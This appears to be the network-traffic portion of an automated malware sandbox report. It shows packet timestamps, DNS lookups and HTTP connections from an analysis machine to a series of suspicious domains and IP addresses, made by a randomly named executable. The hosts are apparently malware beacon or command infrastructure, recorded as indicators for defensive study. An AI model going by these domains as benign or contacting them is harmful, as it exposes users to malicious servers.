                                                        Nov 28, 2024 09:28:20.965312004 CET4980280192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:21.085527897 CET8049802202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:21.085623980 CET4980280192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:21.097902060 CET4980280192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:21.217864990 CET8049802202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:22.468275070 CET8049802202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:22.509221077 CET4980280192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:22.669673920 CET8049802202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:22.669804096 CET4980280192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:22.670532942 CET4980280192.168.2.5202.79.161.151
                                                        Nov 28, 2024 09:28:22.790457010 CET8049802202.79.161.151192.168.2.5
                                                        Nov 28, 2024 09:28:28.717540979 CET4981980192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:28.838359118 CET8049819149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:28.838609934 CET4981980192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:28.853509903 CET4981980192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:28.973548889 CET8049819149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:30.368632078 CET4981980192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:30.529443026 CET8049819149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:31.387290955 CET4982780192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:31.507381916 CET8049827149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:31.507467985 CET4982780192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:31.522336006 CET4982780192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:31.642332077 CET8049827149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:33.040990114 CET4982780192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:33.201739073 CET8049827149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:34.059485912 CET4983380192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:34.179466009 CET8049833149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:34.179542065 CET4983380192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:34.193975925 CET4983380192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:34.314130068 CET8049833149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:34.314145088 CET8049833149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:35.701606989 CET4983380192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:35.865407944 CET8049833149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:36.715908051 CET4983980192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:36.836019993 CET8049839149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:36.836214066 CET4983980192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:36.845954895 CET4983980192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:36.965961933 CET8049839149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:50.731697083 CET8049819149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:50.731779099 CET4981980192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:53.443829060 CET8049827149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:53.443948984 CET4982780192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:56.163778067 CET8049833149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:56.164061069 CET4983380192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:58.778582096 CET8049839149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:28:58.778774977 CET4983980192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:58.779839993 CET4983980192.168.2.5149.88.81.190
                                                        Nov 28, 2024 09:28:58.899784088 CET8049839149.88.81.190192.168.2.5
                                                        Nov 28, 2024 09:29:04.946362972 CET4989880192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:05.066365004 CET804989885.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:05.066457987 CET4989880192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:05.130865097 CET4989880192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:05.251080990 CET804989885.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:06.681116104 CET4989880192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:06.801472902 CET804989885.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:06.801559925 CET4989880192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:07.699868917 CET4990680192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:07.819885015 CET804990685.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:07.819988012 CET4990680192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:07.834927082 CET4990680192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:07.954965115 CET804990685.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:09.337387085 CET4990680192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:09.458266020 CET804990685.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:09.458395004 CET4990680192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:10.356235981 CET4991180192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:10.476214886 CET804991185.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:10.476313114 CET4991180192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:10.491453886 CET4991180192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:10.611581087 CET804991185.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:10.611593962 CET804991185.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:11.993694067 CET4991180192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:12.115611076 CET804991185.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:12.115710020 CET4991180192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:13.012341976 CET4991980192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:13.132289886 CET804991985.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:13.132400036 CET4991980192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:13.141850948 CET4991980192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:13.261940956 CET804991985.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:14.565514088 CET804991985.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:14.565675974 CET804991985.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:14.565776110 CET4991980192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:14.569574118 CET4991980192.168.2.585.159.66.93
                                                        Nov 28, 2024 09:29:14.689400911 CET804991985.159.66.93192.168.2.5
                                                        Nov 28, 2024 09:29:20.116265059 CET4993580192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:20.236865997 CET8049935185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:20.237030983 CET4993580192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:20.355072021 CET4993580192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:20.475087881 CET8049935185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:21.578273058 CET8049935185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:21.578396082 CET8049935185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:21.578452110 CET4993580192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:21.868658066 CET4993580192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:22.902678013 CET4994280192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:23.022732019 CET8049942185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:23.022841930 CET4994280192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:23.120500088 CET4994280192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:23.240581989 CET8049942185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:24.271889925 CET8049942185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:24.271905899 CET8049942185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:24.272227049 CET4994280192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:24.634309053 CET4994280192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:25.710475922 CET4994880192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:25.830477953 CET8049948185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:25.830569983 CET4994880192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:25.920838118 CET4994880192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:26.041167974 CET8049948185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:26.041311026 CET8049948185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:27.125948906 CET8049948185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:27.125967026 CET8049948185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:27.126140118 CET4994880192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:27.431118965 CET4994880192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:28.453977108 CET4995680192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:28.574068069 CET8049956185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:28.574203014 CET4995680192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:28.586983919 CET4995680192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:28.707047939 CET8049956185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:29.873720884 CET8049956185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:29.874557018 CET8049956185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:29.874737024 CET4995680192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:29.877293110 CET4995680192.168.2.5185.27.134.144
                                                        Nov 28, 2024 09:29:29.997354031 CET8049956185.27.134.144192.168.2.5
                                                        Nov 28, 2024 09:29:35.441654921 CET4997280192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:35.561687946 CET8049972104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:35.561780930 CET4997280192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:35.576153040 CET4997280192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:35.696140051 CET8049972104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:37.087616920 CET4997280192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:37.115899086 CET8049972104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:37.116134882 CET4997280192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:37.116512060 CET8049972104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:37.116561890 CET4997280192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:37.207828999 CET8049972104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:37.207882881 CET4997280192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:38.106216908 CET4997980192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:38.226315975 CET8049979104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:38.226442099 CET4997980192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:38.241751909 CET4997980192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:38.361854076 CET8049979104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:39.514647007 CET8049979104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:39.515105963 CET8049979104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:39.515161991 CET4997980192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:39.743608952 CET4997980192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:40.762307882 CET4998580192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:40.882956982 CET8049985104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:40.883373022 CET4998580192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:40.898607969 CET4998580192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:41.018650055 CET8049985104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:41.018675089 CET8049985104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:42.118144035 CET8049985104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:42.118279934 CET8049985104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:42.118334055 CET4998580192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:42.399883986 CET4998580192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:43.462699890 CET4999080192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:43.582602024 CET8049990104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:43.582670927 CET4999080192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:43.597596884 CET4999080192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:43.717631102 CET8049990104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:44.852965117 CET8049990104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:44.853123903 CET8049990104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:44.853283882 CET4999080192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:44.855914116 CET4999080192.168.2.5104.21.95.160
                                                        Nov 28, 2024 09:29:44.975800037 CET8049990104.21.95.160192.168.2.5
                                                        Nov 28, 2024 09:29:50.192425013 CET5000080192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:50.312447071 CET8050000104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:50.312597036 CET5000080192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:50.326726913 CET5000080192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:50.446753025 CET8050000104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:51.800188065 CET8050000104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:51.800765038 CET8050000104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:51.800817013 CET5000080192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:51.838637114 CET5000080192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:52.856184006 CET5000180192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:52.976362944 CET8050001104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:52.976679087 CET5000180192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:52.990622997 CET5000180192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:53.110867023 CET8050001104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:54.465404034 CET8050001104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:54.465543032 CET8050001104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:54.465595007 CET5000180192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:54.494190931 CET5000180192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:55.513314962 CET5000280192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:55.633342028 CET8050002104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:55.633435011 CET5000280192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:55.646843910 CET5000280192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:55.766833067 CET8050002104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:55.766894102 CET8050002104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:57.024688959 CET8050002104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:57.025206089 CET8050002104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:57.025270939 CET5000280192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:57.150109053 CET5000280192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:58.168297052 CET5000380192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:58.288489103 CET8050003104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:58.288604021 CET5000380192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:58.297682047 CET5000380192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:58.417668104 CET8050003104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:59.720415115 CET8050003104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:59.720632076 CET8050003104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:29:59.720885992 CET5000380192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:59.723517895 CET5000380192.168.2.5104.21.57.248
                                                        Nov 28, 2024 09:29:59.843502045 CET8050003104.21.57.248192.168.2.5
                                                        Nov 28, 2024 09:30:05.300848007 CET5000480192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:05.420939922 CET8050004154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:05.421016932 CET5000480192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:05.435058117 CET5000480192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:05.555074930 CET8050004154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:06.946713924 CET5000480192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:06.984256983 CET8050004154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:06.984354019 CET5000480192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:06.984358072 CET8050004154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:06.984433889 CET5000480192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:07.066725016 CET8050004154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:07.066806078 CET5000480192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:07.965315104 CET5000580192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:08.086280107 CET8050005154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:08.086424112 CET5000580192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:08.105695009 CET5000580192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:08.227029085 CET8050005154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:09.618556976 CET5000580192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:09.654422045 CET8050005154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:09.654493093 CET8050005154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:09.654500961 CET5000580192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:09.654552937 CET5000580192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:09.738542080 CET8050005154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:09.738723040 CET5000580192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:10.637461901 CET5000680192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:10.757553101 CET8050006154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:10.757683992 CET5000680192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:10.772250891 CET5000680192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:10.892297983 CET8050006154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:10.892338991 CET8050006154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:12.274785995 CET5000680192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:12.395267010 CET8050006154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:12.395469904 CET5000680192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:13.293564081 CET5000780192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:13.413618088 CET8050007154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:13.416623116 CET5000780192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:13.425357103 CET5000780192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:13.545335054 CET8050007154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:14.923063040 CET8050007154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:14.923084974 CET8050007154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:14.923216105 CET5000780192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:14.941224098 CET5000780192.168.2.5154.88.22.101
                                                        Nov 28, 2024 09:30:15.061213017 CET8050007154.88.22.101192.168.2.5
                                                        Nov 28, 2024 09:30:20.407298088 CET5000880192.168.2.5209.74.77.107
                                                        Nov 28, 2024 09:30:20.527304888 CET8050008209.74.77.107192.168.2.5
                                                        Nov 28, 2024 09:30:20.527394056 CET5000880192.168.2.5209.74.77.107
                                                        Nov 28, 2024 09:30:20.542620897 CET5000880192.168.2.5209.74.77.107
                                                        Nov 28, 2024 09:30:20.662724972 CET8050008209.74.77.107192.168.2.5
                                                        Nov 28, 2024 09:30:22.056204081 CET5000880192.168.2.5209.74.77.107
                                                        Nov 28, 2024 09:30:22.176811934 CET8050008209.74.77.107192.168.2.5
                                                        Nov 28, 2024 09:30:22.180696964 CET5000880192.168.2.5209.74.77.107
                                                        Nov 28, 2024 09:30:23.372046947 CET5000980192.168.2.5209.74.77.107
                                                        Nov 28, 2024 09:30:23.492149115 CET8050009209.74.77.107192.168.2.5
                                                        Nov 28, 2024 09:30:23.492233038 CET5000980192.168.2.5209.74.77.107
                                                        Nov 28, 2024 09:30:23.508573055 CET5000980192.168.2.5209.74.77.107
                                                        Nov 28, 2024 09:30:23.628540039 CET8050009209.74.77.107192.168.2.5
                                                        Nov 28, 2024 09:30:24.718559980 CET8050009209.74.77.107192.168.2.5
                                                        Nov 28, 2024 09:30:24.718681097 CET8050009209.74.77.107192.168.2.5
                                                        Nov 28, 2024 09:30:24.718729019 CET5000980192.168.2.5209.74.77.107
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 28, 2024 09:27:55.130255938 CET4929253192.168.2.51.1.1.1
                                                        Nov 28, 2024 09:27:55.653919935 CET53492921.1.1.1192.168.2.5
                                                        Nov 28, 2024 09:28:12.121680975 CET5371953192.168.2.51.1.1.1
                                                        Nov 28, 2024 09:28:12.826905012 CET53537191.1.1.1192.168.2.5
                                                        Nov 28, 2024 09:28:27.685759068 CET5186753192.168.2.51.1.1.1
                                                        Nov 28, 2024 09:28:28.696868896 CET5186753192.168.2.51.1.1.1
                                                        Nov 28, 2024 09:28:28.715085983 CET53518671.1.1.1192.168.2.5
                                                        Nov 28, 2024 09:28:28.834300041 CET53518671.1.1.1192.168.2.5
                                                        Nov 28, 2024 09:29:03.794246912 CET6336953192.168.2.51.1.1.1
                                                        Nov 28, 2024 09:29:04.908591032 CET53633691.1.1.1192.168.2.5
                                                        Nov 28, 2024 09:29:19.576642990 CET5365953192.168.2.51.1.1.1
                                                        Nov 28, 2024 09:29:20.097702980 CET53536591.1.1.1192.168.2.5
                                                        Nov 28, 2024 09:29:34.888220072 CET5076853192.168.2.51.1.1.1
                                                        Nov 28, 2024 09:29:35.439253092 CET53507681.1.1.1192.168.2.5
                                                        Nov 28, 2024 09:29:49.872243881 CET5257353192.168.2.51.1.1.1
                                                        Nov 28, 2024 09:29:50.189560890 CET53525731.1.1.1192.168.2.5
                                                        Nov 28, 2024 09:30:04.731829882 CET5579053192.168.2.51.1.1.1
                                                        Nov 28, 2024 09:30:05.298259974 CET53557901.1.1.1192.168.2.5
                                                        Nov 28, 2024 09:30:19.950134993 CET6522753192.168.2.51.1.1.1
                                                        Nov 28, 2024 09:30:20.364348888 CET53652271.1.1.1192.168.2.5
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Nov 28, 2024 09:27:55.130255938 CET192.168.2.51.1.1.10x4472Standard query (0)www.nb-shenshi.buzzA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:28:12.121680975 CET192.168.2.51.1.1.10xdf77Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:28:27.685759068 CET192.168.2.51.1.1.10x80aeStandard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:28:28.696868896 CET192.168.2.51.1.1.10x80aeStandard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:29:03.794246912 CET192.168.2.51.1.1.10xcca7Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:29:19.576642990 CET192.168.2.51.1.1.10xea1eStandard query (0)www.amayavp.xyzA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:29:34.888220072 CET192.168.2.51.1.1.10x8c2Standard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:29:49.872243881 CET192.168.2.51.1.1.10x5ec5Standard query (0)www.rgenerousrs.storeA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:30:04.731829882 CET192.168.2.51.1.1.10x959aStandard query (0)www.t91rl7.proA (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:30:19.950134993 CET192.168.2.51.1.1.10x2f08Standard query (0)www.learnwithus.siteA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Nov 28, 2024 09:27:55.653919935 CET1.1.1.1192.168.2.50x4472No error (0)www.nb-shenshi.buzz161.97.168.245A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:28:12.826905012 CET1.1.1.1192.168.2.50xdf77No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 09:28:12.826905012 CET1.1.1.1192.168.2.50xdf77No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:28:12.826905012 CET1.1.1.1192.168.2.50xdf77No error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:28:12.826905012 CET1.1.1.1192.168.2.50xdf77No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:28:12.826905012 CET1.1.1.1192.168.2.50xdf77No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:28:28.715085983 CET1.1.1.1192.168.2.50x80aeNo error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:28:28.834300041 CET1.1.1.1192.168.2.50x80aeNo error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:29:04.908591032 CET1.1.1.1192.168.2.50xcca7No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 09:29:04.908591032 CET1.1.1.1192.168.2.50xcca7No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                        Nov 28, 2024 09:29:04.908591032 CET1.1.1.1192.168.2.50xcca7No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:29:20.097702980 CET1.1.1.1192.168.2.50xea1eNo error (0)www.amayavp.xyz185.27.134.144A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:29:35.439253092 CET1.1.1.1192.168.2.50x8c2No error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:29:35.439253092 CET1.1.1.1192.168.2.50x8c2No error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:29:50.189560890 CET1.1.1.1192.168.2.50x5ec5No error (0)www.rgenerousrs.store104.21.57.248A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:29:50.189560890 CET1.1.1.1192.168.2.50x5ec5No error (0)www.rgenerousrs.store172.67.167.146A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:30:05.298259974 CET1.1.1.1192.168.2.50x959aNo error (0)www.t91rl7.pro154.88.22.101A (IP address)IN (0x0001)false
                                                        Nov 28, 2024 09:30:20.364348888 CET1.1.1.1192.168.2.50x2f08No error (0)www.learnwithus.site209.74.77.107A (IP address)IN (0x0001)false
                                                        • www.nb-shenshi.buzz
                                                        • www.laohub10.net
                                                        • www.xcvbj.asia
                                                        • www.soainsaat.xyz
                                                        • www.amayavp.xyz
                                                        • www.vayui.top
                                                        • www.rgenerousrs.store
                                                        • www.t91rl7.pro
                                                        • www.learnwithus.site
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549742161.97.168.245802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
